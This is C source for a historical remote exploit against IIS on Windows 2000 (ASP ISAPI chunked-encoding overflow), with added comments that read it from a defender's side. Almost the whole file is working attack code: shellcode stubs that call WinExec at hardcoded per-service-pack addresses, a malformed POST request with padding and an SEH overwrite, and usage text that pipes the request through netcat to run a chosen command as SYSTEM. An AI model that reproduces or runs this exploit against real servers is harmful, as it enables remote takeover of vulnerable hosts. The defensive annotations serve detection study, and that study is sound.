//
// Remote exploit for win2000 - ASP ISAPI chunked encoding overflow
// The Dark Raver
//
// Review notes (defensive reading of this historical proof of concept):
//  - The program does no networking itself: it writes a single crafted HTTP
//    POST to stdout, and the usage text shows that output being piped into a
//    separate tool. Everything documented below therefore describes the
//    request bytes, which is what a detection rule would key on.
//  - Request shape (see main): a first "Content-Type:" header whose value is
//    1025 copies of NOP ("\xeb\x09"), twelve 'a' bytes and a raw machine-code
//    stub (one of hell0..hell3); a second "Content-Type:" header;
//    "Transfer-Encoding: chunked"; then chunks of size 0x10 (sixteen 'P'),
//    4 (a raw 4-byte address), 4 (a second raw address) and 0. Two
//    Content-Type headers, non-text bytes in a header value, and raw bytes in
//    4-byte chunks are each anomalous on their own.
//  - Every address is absolute and chosen per Windows 2000 service pack
//    (OFFSET_SEH*, and the WinExec/ExitProcess addresses annotated in each
//    hell* stub), so the payload is tied to specific unpatched builds. The
//    service-pack list is a list of affected targets, not of safe versions;
//    the mitigation is the vendor fix for this overflow and retiring
//    Windows 2000 IIS hosts.
//

#include // NOTE(review): the header name was lost in extraction (angle brackets stripped); the original presumably included the stdio/string/stdlib headers — confirm

#define DEBUG 1
#define ASP "iisstart.asp" // request path used in the POST line
#define OFFSET_SEH0 0x77edf44c // win2000 SP2 + SRP
#define OFFSET_SEH1 0x77ee044c // win2000 SP0
#define OFFSET_SEH2 0x77edf44c // win2000 SP1
#define OFFSET_SEH3 0x77edf44c // win2000 SP2
#define OFFSET_SEH4 0x12345678 // test
#define OFFSET0 0x00477a31 // test1
#define OFFSET1 0x00457a31 // test2
#define OFFSET2 0x00447a31 // test3
#define NOP "\xeb\x09" // jmp +9 -- printed 1025 times as the header-value padding
#define ALIGN 0 // 1 would prepend one extra byte to the padding; 0 here, so nothing is printed

// hell0..hell3 are identical stubs that differ only in the two absolute
// addresses they call. Per the annotations: the jmp/call pair leaves a pointer
// to the trailing "cmd /c ..." string in %esi, %ebx is zeroed and written as a
// byte at offset 0xLEN from %esi (terminating the command), then WinExec and
// ExitProcess are called at fixed addresses. The 0xLEN byte is the "\x20"
// below (index 8 of the array), which main() overwrites with the real command
// length.
char hell0[]= // SP2 + SRP
"\xeb\x15" // start: jmp back
"\x5e" // popl %esi
"\x56" // push %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x88\x5e" // movb %bl,0xLEN(%esi)
"\x20" /* command length (patched by main into hell[8]) */
"\xb8\x94\xee\xe8\x77" // movl $0x77E8EE94, %eax -> WinExec
"\xff\xd0" // call *%eax
"\xb8\x5c\xa9\xe8\x77" // movl $0x77E8A95C, %eax -> ExitProcess
"\xff\xd0" // call *%eax
"\xe8\xe6\xff\xff\xff" // back: call start
"cmd /c "
//"net send 172.18.1.14 testexploit" // strlen = 32
//"cmd /c copy c:\\boot.ini c:\\a.txt"
//"\x30\x30"
"";

char hell1[]= // SP0
"\xeb\x15" // start: jmp back
"\x5e" // popl %esi
"\x56" // push %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x88\x5e" // movb %bl,0xLEN(%esi)
"\x20" /* command length (patched by main into hell[8]) */
"\xb8\x01\x86\xe9\x77" // movl $0x77e98601, %eax -> WinExec
"\xff\xd0" // call *%eax
"\xb8\xbb\xb0\xe9\x77" // movl $0x77e9b0bb, %eax -> ExitProcess
"\xff\xd0" // call *%eax
"\xe8\xe6\xff\xff\xff" // back: call start
"cmd /c "
"";

char hell2[]= // SP1
"\xeb\x15" // start: jmp back
"\x5e" // popl %esi
"\x56" // push %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x88\x5e" // movb %bl,0xLEN(%esi)
"\x20" /* command length (patched by main into hell[8]) */
"\xb8\x0e\xb5\xe9\x77" // movl $0x77e9b50e, %eax -> WinExec
"\xff\xd0" // call *%eax
"\xb8\x2d\xf3\xe8\x77" // movl $0x77e8f32d, %eax -> ExitProcess
"\xff\xd0" // call *%eax
"\xe8\xe6\xff\xff\xff" // back: call start
"cmd /c "
"";

char hell3[] = // SP2
"\xeb\x15" // start: jmp back
"\x5e" // popl %esi
"\x56" // push %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x88\x5e" // movb %bl,0xLEN(%esi)
"\x20" /* command length (patched by main into hell[8]) */
"\xb8\xaf\xa7\xe9\x77" // movl $0x77e9a7af, %eax -> WinExec
"\xff\xd0" // call *%eax
"\xb8\x94\x8f\xe9\x77" // movl $0x77e98f94, %eax -> ExitProcess
"\xff\xd0" // call *%eax
"\xe8\xe6\xff\xff\xff" // back: call start
"cmd /c "
"";

// Entry point. argv[1] selects the target service pack (which stub and which
// OFFSET_SEH* value), argv[2] selects or supplies the second address, argv[3]
// is the command appended to the stub. The finished request is written to
// stdout; progress messages go to stderr so they do not pollute the request.
// Note: main is declared without a return type (implicit int) and never
// returns a value.
main(int argc, char **argv)
{
  int offset=0, offset_seh=0;
  char hell[200]; // stub + appended command; NOTE(review): argv[3] is appended without a length check
  int i=0;
  char len=0; // unused
  char buf[4]; // scratch for emitting a 4-byte address

  if(argc!=4) {
    printf("Remote SYSTEM level exploit for IIS / Win2000\n");
    // NOTE(review): the argument placeholders after "./lluis" were lost in
    // extraction (angle brackets stripped) — confirm against the original.
    printf("Sintaxis: ./lluis \n");
    printf("Uso: ./lluis 0 0 \"net send 172.18.1.14 test\" | nc x.x.x.x 80\n");
    printf("Type 0 - Win2000 SP2 + SRP\n");
    printf("Type 1 - Win2000 SP0\n");
    printf("Type 2 - Win2000 SP1\n");
    printf("Type 3 - Win2000 SP2\n");
    printf("Predefined Offset 0 = 0x00477a31 / 1 = 0x00457a31 / 2 = 0x00447a31\n");
    exit(0);
  }

  // Target types: pick the stub and the SEH address for the named service pack.
  // Type "4" is a test mode that reuses the SP0 stub with a dummy SEH value.
  if(!strcmp(argv[1],"0")) { fprintf(stderr, "Using SP2 + SRP values\n"); offset_seh=OFFSET_SEH0; strcpy(hell,hell0); }
  if(!strcmp(argv[1],"1")) { fprintf(stderr, "Using SP0 values\n"); offset_seh=OFFSET_SEH1; strcpy(hell,hell1); }
  if(!strcmp(argv[1],"2")) { fprintf(stderr, "Using SP1 values\n"); offset_seh=OFFSET_SEH2; strcpy(hell,hell2); }
  if(!strcmp(argv[1],"3")) { fprintf(stderr, "Using SP2 values\n"); offset_seh=OFFSET_SEH3; strcpy(hell,hell3); }
  if(!strcmp(argv[1],"4")) { fprintf(stderr, "Using test values\n"); offset_seh=OFFSET_SEH4; strcpy(hell,hell1); }

  // Offsets: "0".."2" select a predefined value; anything else is parsed as a
  // pointer-formatted number (the "%p" conversion is applied to an int here).
  if(!strcmp(argv[2],"0")) { fprintf(stderr, "Using offset0\n"); offset=OFFSET0; }
  if(!strcmp(argv[2],"1")) { fprintf(stderr, "Using offset1\n"); offset=OFFSET1; }
  if(!strcmp(argv[2],"2")) { fprintf(stderr, "Using offset2\n"); offset=OFFSET2; }
  if(offset==0) { sscanf(argv[2], "%p", &offset); fprintf(stderr, "Using %p\n", offset); }

  strcat(hell, argv[3]);
  // Patch the "\x20" displacement byte (index 8 of every hell* stub) with the
  // length of "cmd /c " plus the user command, so the stub's NUL write lands
  // right after the command.
  hell[8]=(int)strlen(argv[3])+strlen("cmd /c ");
  if(DEBUG) fprintf(stderr, "LEN: %d\n", hell[8]);
  if(DEBUG) fprintf(stderr, "TOTLEN: %d\n", strlen(hell));

  // Request line and headers. The first Content-Type value carries the
  // padding, the 'a' filler and the stub; a second, ordinary Content-Type
  // header follows it.
  printf("POST /");
  printf(ASP);
  printf(" HTTP/1.1\r\n");
  printf("Accept: */*\r\n");
  printf("Host: foobar\r\n");
  printf("Content-Type: ");
  if(ALIGN==1) printf("x"); // ALIGN is 0 above, so this never prints
  for(i=0;i<=1024;i++) printf(NOP); // 1025 copies (loop bound is inclusive)
  printf("aaaaaaaaaaaa");
  printf("%s", hell);
  printf("\r\n");
  printf("Content-Type: application/x-www-form-urlencoded\r\n");
  printf("Transfer-Encoding: chunked\r\n\r\n");
  // Chunked body: 0x10 bytes of 'P', then two 4-byte chunks holding the two
  // addresses as raw bytes, then the terminating 0 chunk.
  printf("10\r\n");
  printf("PPPPPPPPPPPPPPPP\r\n");
  printf("4\r\n");
  //if(DEBUG) sleep(10);
  // Type-punning an int into buf emits it in host byte order; presumably a
  // little-endian build host is assumed — confirm.
  *(int *)&buf[0]=offset;
  for(i=0;i<4;i++) putchar(buf[i]);
  printf("\r\n4\r\n");
  *(int *)&buf[0]=offset_seh;
  for(i=0;i<4;i++) putchar(buf[i]);
  printf("\r\n0\r\n\r\n");
}